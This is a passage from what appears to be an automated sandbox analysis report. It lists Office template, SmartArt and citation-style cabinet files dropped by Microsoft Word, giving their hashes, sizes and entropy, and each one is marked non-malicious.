                                    SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):33610
                                    Entropy (8bit):7.8340762758330476
                                    Encrypted:false
                                    SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                    MD5:51804E255C573176039F4D5B55C12AB2
                                    SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                    SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                    SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):20457
                                    Entropy (8bit):7.612540359660869
                                    Encrypted:false
                                    SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                    MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                    SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                    SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                    SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31471
                                    Entropy (8bit):7.818389271364328
                                    Encrypted:false
                                    SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                    MD5:91AADBEC4171CFA8292B618492F5EF34
                                    SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                    SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                    SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):35519
                                    Entropy (8bit):7.846686335981972
                                    Encrypted:false
                                    SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                    MD5:53EE9DA49D0B84357038ECF376838D2E
                                    SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                    SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                    SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):32833
                                    Entropy (8bit):7.825460303519308
                                    Encrypted:false
                                    SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                    MD5:205AF51604EF96EF1E8E60212541F742
                                    SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                    SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                    SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31482
                                    Entropy (8bit):7.808057272318224
                                    Encrypted:false
                                    SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                    MD5:F10DF902980F1D5BEEA96B2C668408A7
                                    SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                    SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                    SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31835
                                    Entropy (8bit):7.81952379746457
                                    Encrypted:false
                                    SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                    MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                    SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                    SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                    SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):34816
                                    Entropy (8bit):7.840826397575377
                                    Encrypted:false
                                    SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                    MD5:62863124CDCDA135ECC0E722782CB888
                                    SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                    SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                    SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):19288
                                    Entropy (8bit):7.570850633867256
                                    Encrypted:false
                                    SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                    MD5:B9A6FF715719EE9DE16421AB983CA745
                                    SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                    SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                    SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):20235
                                    Entropy (8bit):7.61176626859621
                                    Encrypted:false
                                    SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                    MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                    SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                    SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                    SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):26944
                                    Entropy (8bit):7.7574645319832225
                                    Encrypted:false
                                    SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                    MD5:F913DD84915753042D856CEC4E5DABA5
                                    SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                    SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                    SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):25314
                                    Entropy (8bit):7.729848360340861
                                    Encrypted:false
                                    SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                    MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                    SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                    SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                    SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):19893
                                    Entropy (8bit):7.592090622603185
                                    Encrypted:false
                                    SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                    MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                    SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                    SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                    SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):21357
                                    Entropy (8bit):7.641082043198371
                                    Encrypted:false
                                    SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                    MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                    SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                    SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                    SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):22340
                                    Entropy (8bit):7.668619892503165
                                    Encrypted:false
                                    SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                    MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                    SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                    SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                    SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):22008
                                    Entropy (8bit):7.662386258803613
                                    Encrypted:false
                                    SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                    MD5:ABBF10CEE9480E41D81277E9538F98CB
                                    SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                    SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                    SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):23597
                                    Entropy (8bit):7.692965575678876
                                    Encrypted:false
                                    SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                    MD5:7C645EC505982FE529D0E5035B378FFC
                                    SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                    SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                    SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):22149
                                    Entropy (8bit):7.659898883631361
                                    Encrypted:false
                                    SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                    MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                    SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                    SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                    SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):21111
                                    Entropy (8bit):7.6297992466897675
                                    Encrypted:false
                                    SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                    MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                    SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                    SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                    SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31562
                                    Entropy (8bit):7.81640835713744
                                    Encrypted:false
                                    SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                    MD5:1D6F8E73A0662A48D332090A4C8C898F
                                    SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                    SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                    SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):21875
                                    Entropy (8bit):7.6559132103953305
                                    Encrypted:false
                                    SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                    MD5:E532038762503FFA1371DF03FA2E222D
                                    SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                    SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                    SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):28911
                                    Entropy (8bit):7.7784119983764715
                                    Encrypted:false
                                    SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                    MD5:6D787B1E223DB6B91B69238062CCA872
                                    SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                    SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                    SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):30957
                                    Entropy (8bit):7.808231503692675
                                    Encrypted:false
                                    SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                    MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                    SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                    SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                    SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31083
                                    Entropy (8bit):7.814202819173796
                                    Encrypted:false
                                    SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                    MD5:89A9818E6658D73A73B642522FF8701F
                                    SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                    SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                    SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):46413
                                    Entropy (8bit):7.9071408623961394
                                    Encrypted:false
                                    SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                    MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                    SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                    SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                    SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31008
                                    Entropy (8bit):7.806058951525675
                                    Encrypted:false
                                    SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                    MD5:E033CCBC7BA787A2F824CE0952E57D44
                                    SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                    SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                    SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31605
                                    Entropy (8bit):7.820497014278096
                                    Encrypted:false
                                    SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                    MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                    SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                    SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                    SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):43653
                                    Entropy (8bit):7.899157106666598
                                    Encrypted:false
                                    SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                    MD5:DA3380458170E60CBEA72602FDD0D955
                                    SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                    SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                    SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):42788
                                    Entropy (8bit):7.89307894056
                                    Encrypted:false
                                    SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                    MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                    SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
